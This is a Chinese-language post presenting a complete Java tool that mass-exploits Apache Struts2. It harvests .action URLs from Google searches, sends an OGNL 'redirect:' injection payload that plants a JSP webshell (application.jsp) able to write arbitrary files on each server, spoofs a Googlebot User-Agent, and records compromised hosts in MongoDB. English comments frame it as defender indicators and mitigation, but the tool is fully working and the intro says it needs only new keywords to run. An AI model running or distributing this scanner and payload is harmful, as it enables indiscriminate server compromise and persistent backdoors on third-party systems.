Struts2漏洞批量GetShell到MongoDb数据库
这个很简单，改下main的str的关键字就可以自动getshell并导入mongodb数据库。
[只需要添加jsoup和mongodb的jar包]
import java.io.IOException;
import java.net.URL;
import java.net.URLConnection;
import java.net.UnknownHostException;
import java.util.ArrayList;
import java.util.List;
import java.util.logging.Logger;
import java.util.regex.Pattern;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;
import com.mongodb.BasicDBObject;
import com.mongodb.DB;
import com.mongodb.DBCollection;
import com.mongodb.DBObject;
import com.mongodb.Mongo;
/**
 * Mass scanner that walks Google search results for Struts2 ".action" endpoints, sends
 * an OGNL injection payload that writes a JSP file into the target's web root, and
 * records every host whose dropped file answers with the "[/ok]" marker in a local
 * MongoDB collection.
 *
 * NOTE(review): this is an attack tool; it is documented here so that defenders can
 * recognise its traffic and its artefacts. Indicators visible in this code:
 * <ul>
 *   <li>a request to an .action URL whose query string contains {@code redirect:${} and
 *       {@code com.opensymphony.xwork2.dispatcher.HttpServletRequest} ("#" is sent as %23);</li>
 *   <li>a follow-up GET for {@code /application.jsp} on the same host a few seconds later,
 *       and later requests to that file carrying parameters "f" and "t";</li>
 *   <li>the spoofed User-Agent {@code Googlebot/2.1 (+http://www.googlebot.com/bot.html} —
 *       note the missing closing parenthesis, which the genuine Googlebot UA does have;</li>
 *   <li>the scanner only fires one request per target and does not verify the framework
 *       version first, so every .action URL indexed by Google is hit.</li>
 * </ul>
 * Mitigation is upgrading Struts2 to a release that no longer evaluates OGNL in
 * "redirect:" action-prefix parameters; a host found with /application.jsp present
 * should be treated as compromised and the file's write access to the web root reviewed.
 */
public class StrutsTools {
// URL-encoded OGNL payload appended to the target's query string. Decoded, it uses the
// "redirect:" action prefix to evaluate OGNL that resolves the web root via
// HttpServletRequest.getRealPath("/") and writes the value of request parameter "c"
// to <webroot>/application.jsp. "c" holds a small JSP: when parameter "f" is present it
// writes parameter "t" to <webroot>/<f>, otherwise it prints "[/ok]" (the marker
// getShell() looks for). Log-search terms: "redirect:${", "application.jsp", "%23context".
private static String GETSHELLPOC1 = "redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22application.jsp%22).replaceAll(\"\\\\\\\\\",\"/\"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%7B%28new%20java.io.FileOutputStream%28application.getRealPath%28%22%2F%22%29%2Brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%7Delse%7Bout.println%28%22%5B%2Fok%5D%22%29%3B%7D%25%3E";
/**
 * Writes {@code log} at INFO level through the java.util.logging logger named "s2".
 * The lookup is repeated on every call; Logger.getLogger returns the shared named instance.
 * @param log message text (exceptions are passed as e.toString(), so no stack trace is kept)
 */
public void log(String log){
Logger logger = Logger.getLogger("s2");
logger.info(log);
}
/**
 * Inserts {@code obj} into collection "shell" of database "shell" on the MongoDB at
 * localhost:27017. A new Mongo client is created on every call and never closed.
 * Only UnknownHostException is caught (and printed); any other driver failure propagates
 * unchecked to the caller.
 * @param obj document to store — getShell() stores {"shell": "<host>/application.jsp"}
 */
public void toSave(DBObject obj) {
try {
DB db = new Mongo("localhost", 27017).getDB("shell");
DBCollection conn = db.getCollection("shell");
conn.insert(obj);
} catch (UnknownHostException e) {
e.printStackTrace();
}
}
/**
 * Sends a single GET to {@code url} with 3 s connect and read timeouts and discards the
 * response. The URL is echoed to stdout first. Every exception (including
 * MalformedURLException and timeouts) is logged and swallowed, so the caller cannot tell
 * whether the request reached the server.
 * @param url full URL including the payload query string built by getShell()
 */
public void doGet(String url) {
try {
System.out.println(url);
URL realUrl = new URL(url);
URLConnection connection = realUrl.openConnection();
connection.setConnectTimeout(3000);
connection.setReadTimeout(3000);
connection.connect();
// Opening the stream is what actually sends the request; the body is never read or closed.
connection.getInputStream();
} catch (Exception e) {
log(e.toString());
}
}
/**
 * Undoes the small set of percent-escapes Google applies to result links: "%3F"/"%3f"
 * become "?", "%3D"/"%3d" become "=", "%26" becomes "&". Nothing else is decoded.
 * The replaceAll calls take a regex, but these patterns contain no metacharacters, so
 * they behave like plain replace.
 * @param url percent-escaped link taken from a Google results page
 * @return the link with the three characters above restored
 */
public String toURL(String url){
url = url.replace("%3F", "?");
url = url.replace("%3f", "?");
url = url.replaceAll("%3d", "=");
url = url.replaceAll("%3D", "=");
url = url.replaceAll("%26", "&");
return url;
}
/**
 * Attacks one target: appends GETSHELLPOC1 to {@code url} (after "&" if the URL already
 * has a query, else "?") and sends it via doGet(), then fetches host + "/application.jsp"
 * with the spoofed Googlebot User-Agent. If the response contains "[/ok]" the file was
 * written and its URL is stored through toSave().
 * host is the URL with its path+query (URL.getFile()) cut off; if getFile() is empty,
 * indexOf("") is 0 and host becomes "" — the follow-up request then goes nowhere useful.
 * IOExceptions from either request are logged and swallowed.
 * @param url the .action URL found by test()
 */
public void getShell(String url){
try {
doGet(url+(url.indexOf("?")!=-1?"&":"?")+GETSHELLPOC1);
URL l = new URL(url);
String host = url.substring(0,url.indexOf(l.getFile()));
// The UA string is missing its closing ")"; genuine Googlebot does not send it that way.
Document doc = Jsoup.connect(host+"/application.jsp").userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(3000).get();
if(doc.toString().indexOf("[/ok]")!=-1){
DBObject obj = new BasicDBObject();
obj.put("shell", host+"/application.jsp");
toSave(obj);
}
} catch (IOException e) {
log(e.toString());
}
}
/**
 * Processes one Google results page at {@code url}: takes every "a" under elements with
 * class "r", strips the "/url?q=" prefix, keeps only the first link per host, then calls
 * getShell() on each link after trimming Google's "&sa=U&ei=" tracking suffix and
 * decoding it with toURL().
 * Host de-duplication compiles the host as a regex and searches ls.toString(); regex
 * metacharacters in a host are not escaped. If a link lacks "&sa=U&ei=", indexOf returns
 * -1 and substring throws StringIndexOutOfBoundsException, which is not an IOException
 * and so aborts the whole run from main(). Non-URL hrefs fail in new URL() with
 * MalformedURLException, which is caught and logged.
 * @param url a Google search URL as built by main()
 */
public void test(String url){
try {
Document doc = Jsoup.connect(url).userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(3000).get();
Elements element = doc.getElementsByClass("r");
List<String> ls = new ArrayList<String>();
for(Element e : element){
Elements a = e.getElementsByTag("a");
for(Element b : a){
String s = b.attr("href").replace("/url?q=", "");
URL u = new URL(s);
String host = s.substring(0,s.indexOf(u.getFile()));
if(!Pattern.compile(host).matcher(ls.toString()).find()){
ls.add(s);
}
}
}
// System.out.println(ls.toString());
for(String s:ls){
getShell(toURL(s.substring(0,s.indexOf("&sa=U&ei="))));
}
} catch (IOException e) {
log(e.toString());
}
}
/**
 * Entry point. For each comma-separated keyword in {@code str} it queries www.google.ws
 * for "filetype:action inurl:<keyword>", five pages of 100 results each, and hands every
 * page to test() on a fresh StrutsTools instance. Any unchecked exception escaping
 * test() ends the run.
 * @param args unused
 */
public static void main(String[] args) {
String str = "passwordRecover.action,login,show,article,list,shop,admin,service,index";
String[] s = str.split(",");
for(String b:s){
for (int i = 0; i < 5; i++) {
String url = "http://www.google.ws/search?q=filetype:action+inurl:"+b+"&num=100&newwindow=1&ei=eOl3UqXUL8eTiAfHiYDICw&start="+(i*100)+"&sa=N&biw=1366&bih=578";
StrutsTools p = new StrutsTools();
p.test(url);
}
}
}
}